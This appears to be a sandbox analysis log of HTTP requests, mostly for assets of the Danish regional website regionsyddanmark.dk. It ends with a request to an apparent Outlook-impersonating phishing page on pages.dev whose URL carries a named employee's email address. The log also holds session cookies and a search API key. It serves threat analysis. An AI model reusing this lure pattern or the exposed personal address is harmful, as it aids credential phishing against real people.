          Source: global trafficHTTP traffic detected: GET /dist/css/style-34c02e3aa3.css HTTP/1.1Host: regionsyddanmark.dkConnection: keep-aliveOrigin: https://regionsyddanmark.dksec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: text/css,*/*;q=0.1Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: styleSec-Fetch-Storage-Access: activeReferer: https://regionsyddanmark.dk/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
          Source: global trafficHTTP traffic detected: GET /media/oqdbl2ov/regions_logo-1.svg HTTP/1.1Host: regionsyddanmark.dkConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageSec-Fetch-Storage-Access: activeReferer: https://regionsyddanmark.dk/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
          Source: global trafficHTTP traffic detected: GET /media/qpxlgn1n/blodproever_ikon.svg HTTP/1.1Host: regionsyddanmark.dkConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageSec-Fetch-Storage-Access: activeReferer: https://regionsyddanmark.dk/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
          Source: global trafficHTTP traffic detected: GET /media/lcgfzarc/blaa-blink_ikon.svg HTTP/1.1Host: regionsyddanmark.dkConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageSec-Fetch-Storage-Access: activeReferer: https://regionsyddanmark.dk/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
          Source: global trafficHTTP traffic detected: GET /yrt5fsi.css HTTP/1.1Host: use.typekit.netConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: text/css,*/*;q=0.1Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleSec-Fetch-Storage-Access: activeReferer: https://regionsyddanmark.dk/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
          Source: global trafficHTTP traffic detected: GET /media/oqdbl2ov/regions_logo-1.svg HTTP/1.1Host: regionsyddanmark.dkConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
          Source: global trafficHTTP traffic detected: GET /p.css?s=1&k=yrt5fsi&ht=tk&f=31165&a=32793850&app=typekit&e=css HTTP/1.1Host: p.typekit.netConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: text/css,*/*;q=0.1Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleSec-Fetch-Storage-Access: activeReferer: https://use.typekit.net/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
          Source: global trafficHTTP traffic detected: GET /media/lk3dyg0b/ikon_rettigheder.svg HTTP/1.1Host: regionsyddanmark.dkConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageSec-Fetch-Storage-Access: activeReferer: https://regionsyddanmark.dk/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
          Source: global trafficHTTP traffic detected: GET /media/qpxlgn1n/blodproever_ikon.svg HTTP/1.1Host: regionsyddanmark.dkConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
          Source: global trafficHTTP traffic detected: GET /media/llodxjjd/transport-patient_ikon.svg HTTP/1.1Host: regionsyddanmark.dkConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageSec-Fetch-Storage-Access: activeReferer: https://regionsyddanmark.dk/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
          Source: global trafficHTTP traffic detected: GET /media/lcgfzarc/blaa-blink_ikon.svg HTTP/1.1Host: regionsyddanmark.dkConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
          Source: global trafficHTTP traffic detected: GET /v2/monsido-script.js HTTP/1.1Host: app-script.monsido.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptSec-Fetch-Storage-Access: activeReferer: https://regionsyddanmark.dk/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
          Source: global trafficHTTP traffic detected: GET /af/9098db/00000000000000003b9ae80c/27/l?primer=7cdcb44be4a7db8877ffa5c0007b8dd865b3bbc383831fe2ea177f62257a9191&fvd=n5&v=3 HTTP/1.1Host: use.typekit.netConnection: keep-aliveOrigin: https://regionsyddanmark.dksec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: fontReferer: https://use.typekit.net/yrt5fsi.cssAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
          Source: global trafficHTTP traffic detected: GET /dist/js/behaviors-d57c2eeb.pkg.js HTTP/1.1Host: regionsyddanmark.dkConnection: keep-aliveOrigin: https://regionsyddanmark.dksec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: scriptSec-Fetch-Storage-Access: activeReferer: https://regionsyddanmark.dk/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
          Source: global trafficHTTP traffic detected: GET /media/2y4nwgys/telefon_ikon.svg HTTP/1.1Host: regionsyddanmark.dkConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageSec-Fetch-Storage-Access: activeReferer: https://regionsyddanmark.dk/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
          Source: global trafficHTTP traffic detected: GET /media/dvfhyfra/ikon_v%C3%A6rdier-og-strategier-01.svg HTTP/1.1Host: regionsyddanmark.dkConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageSec-Fetch-Storage-Access: activeReferer: https://regionsyddanmark.dk/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
          Source: global trafficHTTP traffic detected: GET /media/f3enu2bz/ikon_milj%C3%B8.svg HTTP/1.1Host: regionsyddanmark.dkConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageSec-Fetch-Storage-Access: activeReferer: https://regionsyddanmark.dk/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
          Source: global trafficHTTP traffic detected: GET /media/h5fdq5gq/sekretaer_ikon.svg HTTP/1.1Host: regionsyddanmark.dkConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageSec-Fetch-Storage-Access: activeReferer: https://regionsyddanmark.dk/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
          Source: global trafficHTTP traffic detected: GET /media/lk3dyg0b/ikon_rettigheder.svg HTTP/1.1Host: regionsyddanmark.dkConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: NSC_mc_vncsbdp_xfc_qspe=ffffffff09d114df45525d5f4f58455e445a4a42378b
          Source: global trafficHTTP traffic detected: GET /media/cqsbfjda/opkaldsrum15.jpg?width=1&format=webp HTTP/1.1Host: regionsyddanmark.dkConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageSec-Fetch-Storage-Access: activeReferer: https://regionsyddanmark.dk/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
          Source: global trafficHTTP traffic detected: GET /media/llodxjjd/transport-patient_ikon.svg HTTP/1.1Host: regionsyddanmark.dkConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: NSC_mc_vncsbdp_xfc_qspe=ffffffff09d114df45525d5f4f58455e445a4a42378b
          Source: global trafficHTTP traffic detected: GET /media/htmltoyi/dobbeltdiagnose.jpg?width=1&format=webp HTTP/1.1Host: regionsyddanmark.dkConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageSec-Fetch-Storage-Access: activeReferer: https://regionsyddanmark.dk/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
          Source: global trafficHTTP traffic detected: GET /media/2y4nwgys/telefon_ikon.svg HTTP/1.1Host: regionsyddanmark.dkConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: NSC_mc_vncsbdp_xfc_qspe=ffffffff09d114df45525d5f4f58455e445a4a42378b
          Source: global trafficHTTP traffic detected: GET /media/msfnvbuc/dronebillede-af-byggeriet-af-det-nye-ouh.jpg?width=1&format=webp HTTP/1.1Host: regionsyddanmark.dkConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageSec-Fetch-Storage-Access: activeReferer: https://regionsyddanmark.dk/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
          Source: global trafficHTTP traffic detected: GET /media/dvfhyfra/ikon_v%C3%A6rdier-og-strategier-01.svg HTTP/1.1Host: regionsyddanmark.dkConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: NSC_mc_vncsbdp_xfc_qspe=ffffffff09d114df45525d5f4f58455e445a4a42378b
          Source: global trafficHTTP traffic detected: GET /media/mk1heo0c/mikkel-hansen.jpg?width=1&format=webp HTTP/1.1Host: regionsyddanmark.dkConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageSec-Fetch-Storage-Access: activeReferer: https://regionsyddanmark.dk/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
          Source: global trafficHTTP traffic detected: GET /media/f3enu2bz/ikon_milj%C3%B8.svg HTTP/1.1Host: regionsyddanmark.dkConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: NSC_mc_vncsbdp_xfc_qspe=ffffffff09d114df45525d5f4f58455e445a4a42378b
          Source: global trafficHTTP traffic detected: GET /scripts/beta/sayt/0.9.5/sayt.bundle.js HTTP/1.1Host: customer.cludo.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptSec-Fetch-Storage-Access: activeReferer: https://regionsyddanmark.dk/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
          Source: global trafficHTTP traffic detected: GET /media/ekuljfvy/vand-og-jord.mp4 HTTP/1.1Host: regionsyddanmark.dkConnection: keep-alivesec-ch-ua-platform: "Windows"Accept-Encoding: identity;q=1, *;q=0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: videoSec-Fetch-Storage-Access: activeReferer: https://regionsyddanmark.dk/Accept-Language: en-US,en;q=0.9Range: bytes=0-
          Source: global trafficHTTP traffic detected: GET /media/h5fdq5gq/sekretaer_ikon.svg HTTP/1.1Host: regionsyddanmark.dkConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: NSC_mc_vncsbdp_xfc_qspe=ffffffff09d114df45525d5f4f58455e445a4a42378b
          Source: global trafficHTTP traffic detected: GET /dist/js/13-2bfd4e8e.pkg.js HTTP/1.1Host: regionsyddanmark.dkConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptSec-Fetch-Storage-Access: activeReferer: https://regionsyddanmark.dk/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
          Source: global trafficHTTP traffic detected: GET /scripts/bundles/search-script.js HTTP/1.1Host: customer.cludo.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptSec-Fetch-Storage-Access: activeReferer: https://regionsyddanmark.dk/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
          Source: global trafficHTTP traffic detected: GET /media/cqsbfjda/opkaldsrum15.jpg?width=1&format=webp HTTP/1.1Host: regionsyddanmark.dkConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: NSC_mc_vncsbdp_xfc_qspe=ffffffff09d114df45525d5f4f58455e445a4a42378b
          Source: global trafficHTTP traffic detected: GET /dist/js/18-4c92a603.pkg.js HTTP/1.1Host: regionsyddanmark.dkConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptSec-Fetch-Storage-Access: activeReferer: https://regionsyddanmark.dk/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
          Source: global trafficHTTP traffic detected: GET /dist/js/7-a2ce62ac.pkg.js HTTP/1.1Host: regionsyddanmark.dkConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptSec-Fetch-Storage-Access: activeReferer: https://regionsyddanmark.dk/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
          Source: global trafficHTTP traffic detected: GET /media/htmltoyi/dobbeltdiagnose.jpg?width=1&format=webp HTTP/1.1Host: regionsyddanmark.dkConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: NSC_mc_vncsbdp_xfc_qspe=ffffffff09d114df45525d5f4f58455e445a4a42378b
          Source: global trafficHTTP traffic detected: GET /media/mk1heo0c/mikkel-hansen.jpg?width=1&format=webp HTTP/1.1Host: regionsyddanmark.dkConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: NSC_mc_vncsbdp_xfc_qspe=ffffffff09d114df45525d5f4f58455e445a4a42378b
          Source: global trafficHTTP traffic detected: GET /dist/js/5-df5b9302.pkg.js HTTP/1.1Host: regionsyddanmark.dkConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptSec-Fetch-Storage-Access: activeReferer: https://regionsyddanmark.dk/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
          Source: global trafficHTTP traffic detected: GET /media/msfnvbuc/dronebillede-af-byggeriet-af-det-nye-ouh.jpg?width=1&format=webp HTTP/1.1Host: regionsyddanmark.dkConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: NSC_mc_vncsbdp_xfc_qspe=ffffffff09d114df45525d5f4f58455e445a4a42378b
          Source: global trafficHTTP traffic detected: GET /api/v3/92/11814/websites/publicsettings? HTTP/1.1Host: api-eu1.cludo.comConnection: keep-alivesec-ch-ua-platform: "Windows"Authorization: SiteKey OTI6MTE4MTQ6U2VhcmNoS2V5User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: application/jsonsec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"Content-type: application/json;charset=UTF-8sec-ch-ua-mobile: ?0Origin: https://regionsyddanmark.dkSec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://regionsyddanmark.dk/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
          Source: global trafficHTTP traffic detected: GET /favicon.ico HTTP/1.1Host: new-session-outlook-com-01262025-veryfing-successfuli.pages.devConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://new-session-outlook-com-01262025-veryfing-successfuli.pages.dev/newsession?eta=dorte.moeller.jensen@rsyd.dkAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
